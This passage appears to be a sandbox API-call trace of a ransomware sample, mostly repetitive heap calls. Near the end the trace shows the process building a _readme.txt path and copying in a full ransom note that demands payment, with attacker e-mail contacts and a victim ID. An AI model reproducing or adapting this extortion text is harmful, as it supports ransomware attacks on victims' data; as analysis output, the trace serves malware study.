hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.129] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.129] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.129] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.129] PathFindFileNameW (pszPath="") returned="" [0094.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.129] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.130] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.131] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.131] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0094.131] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0094.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.132] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0094.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.132] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.132] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.132] RtlAllocateHeap 